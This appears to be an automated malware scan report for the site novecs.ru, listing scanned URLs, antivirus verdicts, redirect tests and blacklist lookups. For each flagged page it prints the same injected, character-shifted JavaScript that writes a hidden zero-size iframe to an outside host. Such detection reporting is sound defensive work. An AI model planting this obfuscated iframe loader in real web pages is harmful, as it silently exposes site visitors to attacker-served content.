Scanned pages/files
| Request | Server response | Status |
http://novecs.ru/ | 200 OK Content-Length: 8941 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- var s="=tdsjqu?epdvnfou/xsjuf)(=jgsbnf!tsd>#iuuq;00bqq/mjolmfbet/wo0jogp/qiq#!xjeui>#1#!ifjhiu>#1#!!gsbnfcpsefs>#1#?=0jgsbnf?(*<=0tdsjqu?"; m=""; for (i=0; i<s.length; i++) { if(s.charCodeAt(i) == 28){ m+= '&';} else if (s.charCodeAt(i) == 23) { m+= '!';} else { m+=String.fromCharCode(s.charCodeAt(i)-1); }}document.write(m); Antivirus reports:
| ||
http://novecs.ru/media/jui/js/jquery.min.js | 200 OK Content-Length: 95786 Content-Type: application/x-javascript | clean |
http://novecs.ru/media/jui/js/jquery-noconflict.js | 200 OK Content-Length: 21 Content-Type: application/x-javascript | clean |
http://novecs.ru/media/jui/js/jquery-migrate.min.js | 200 OK Content-Length: 7199 Content-Type: application/x-javascript | clean |
http://novecs.ru/media/jui/js/bootstrap.min.js | 200 OK Content-Length: 29156 Content-Type: application/x-javascript | clean |
http://novecs.ru/templates/novecs/js/html5shiv.min.js | 200 OK Content-Length: 2636 Content-Type: application/x-javascript | clean |
http://novecs.ru/templates/novecs/js/scroll.js | 200 OK Content-Length: 294 Content-Type: application/x-javascript | clean |
http://novecs.ru/home | 200 OK Content-Length: 23907 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- var s="=tdsjqu?epdvnfou/xsjuf)(=jgsbnf!tsd>#iuuq;00bqq/mjolmfbet/wo0jogp/qiq#!xjeui>#1#!ifjhiu>#1#!!gsbnfcpsefs>#1#?=0jgsbnf?(*<=0tdsjqu?"; m=""; for (i=0; i<s.length; i++) { if(s.charCodeAt(i) == 28){ m+= '&';} else if (s.charCodeAt(i) == 23) { m+= '!';} else { m+=String.fromCharCode(s.charCodeAt(i)-1); }}document.write(m); Antivirus reports:
| ||
http://novecs.ru/components/com_rsform/assets/js/script.js?v=49 | 200 OK Content-Length: 19213 Content-Type: application/x-javascript | clean |
http://novecs.ru//yandex.st/share/share.js/ | 404 Not Found Content-Length: 2432 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- var s="=tdsjqu?epdvnfou/xsjuf)(=jgsbnf!tsd>#iuuq;00bqq/mjolmfbet/wo0jogp/qiq#!xjeui>#1#!ifjhiu>#1#!!gsbnfcpsefs>#1#?=0jgsbnf?(*<=0tdsjqu?"; m=""; for (i=0; i<s.length; i++) { if(s.charCodeAt(i) == 28){ m+= '&';} else if (s.charCodeAt(i) == 23) { m+= '!';} else { m+=String.fromCharCode(s.charCodeAt(i)-1); }}document.write(m); Antivirus reports:
| ||
http://novecs.ru/index.php | 200 OK Content-Length: 8950 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- var s="=tdsjqu?epdvnfou/xsjuf)(=jgsbnf!tsd>#iuuq;00bqq/mjolmfbet/wo0jogp/qiq#!xjeui>#1#!ifjhiu>#1#!!gsbnfcpsefs>#1#?=0jgsbnf?(*<=0tdsjqu?"; m=""; for (i=0; i<s.length; i++) { if(s.charCodeAt(i) == 28){ m+= '&';} else if (s.charCodeAt(i) == 23) { m+= '!';} else { m+=String.fromCharCode(s.charCodeAt(i)-1); }}document.write(m); Antivirus reports:
| ||
http://novecs.ru/contacts | 200 OK Content-Length: 15240 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- var s="=tdsjqu?epdvnfou/xsjuf)(=jgsbnf!tsd>#iuuq;00bqq/mjolmfbet/wo0jogp/qiq#!xjeui>#1#!ifjhiu>#1#!!gsbnfcpsefs>#1#?=0jgsbnf?(*<=0tdsjqu?"; m=""; for (i=0; i<s.length; i++) { if(s.charCodeAt(i) == 28){ m+= '&';} else if (s.charCodeAt(i) == 23) { m+= '!';} else { m+=String.fromCharCode(s.charCodeAt(i)-1); }}document.write(m); Antivirus reports:
| ||
http://novecs.ru//api-maps.yandex.ru/services/constructor/1.0/js/?sid=8J24T_zk1AI8oU4yT0Tmfn56rzroMSdR&width=100%&height=600/ | 404 Not Found Content-Length: 2432 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- var s="=tdsjqu?epdvnfou/xsjuf)(=jgsbnf!tsd>#iuuq;00bqq/mjolmfbet/wo0jogp/qiq#!xjeui>#1#!ifjhiu>#1#!!gsbnfcpsefs>#1#?=0jgsbnf?(*<=0tdsjqu?"; m=""; for (i=0; i<s.length; i++) { if(s.charCodeAt(i) == 28){ m+= '&';} else if (s.charCodeAt(i) == 23) { m+= '!';} else { m+=String.fromCharCode(s.charCodeAt(i)-1); }}document.write(m); Antivirus reports:
| ||
http://novecs.ru/test404page.js | 404 Not Found Content-Length: 2420 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- var s="=tdsjqu?epdvnfou/xsjuf)(=jgsbnf!tsd>#iuuq;00bqq/mjolmfbet/wo0jogp/qiq#!xjeui>#1#!ifjhiu>#1#!!gsbnfcpsefs>#1#?=0jgsbnf?(*<=0tdsjqu?"; m=""; for (i=0; i<s.length; i++) { if(s.charCodeAt(i) == 28){ m+= '&';} else if (s.charCodeAt(i) == 23) { m+= '!';} else { m+=String.fromCharCode(s.charCodeAt(i)-1); }}document.write(m); Antivirus reports:
| ||
http://novecs.ru/tel:+79602986205 | 404 Not Found Content-Length: 2432 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- var s="=tdsjqu?epdvnfou/xsjuf)(=jgsbnf!tsd>#iuuq;00bqq/mjolmfbet/wo0jogp/qiq#!xjeui>#1#!ifjhiu>#1#!!gsbnfcpsefs>#1#?=0jgsbnf?(*<=0tdsjqu?"; m=""; for (i=0; i<s.length; i++) { if(s.charCodeAt(i) == 28){ m+= '&';} else if (s.charCodeAt(i) == 23) { m+= '!';} else { m+=String.fromCharCode(s.charCodeAt(i)-1); }}document.write(m); Antivirus reports:
| ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: novecs.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 08 Nov 2014 13:17:59 GMT
Pragma: no-cache
Server: nginx/1.4.4
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 08 Nov 2014 13:17:59 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 11257dfcdaff64a2e08e9b9f82ab7749=fsffl6vvndbeqvuiutqq7ffbr3; path=/; HttpOnly
X-Powered-By: PHP/5.3.27-pl0-gentoo
GET / HTTP/1.1
Host: novecs.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 08 Nov 2014 13:17:59 GMT
Pragma: no-cache
Server: nginx/1.4.4
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 08 Nov 2014 13:17:59 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 11257dfcdaff64a2e08e9b9f82ab7749=fsffl6vvndbeqvuiutqq7ffbr3; path=/; HttpOnly
X-Powered-By: PHP/5.3.27-pl0-gentoo
Second query (visit from search engine):
GET / HTTP/1.1
Host: novecs.ru
Referer: http://www.google.com/search?q=novecs.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: novecs.ru
Referer: http://www.google.com/search?q=novecs.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=novecs.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://novecs.ru/
Result: novecs.ru is not infected or malware details are not published yet.
Result: novecs.ru is not infected or malware details are not published yet.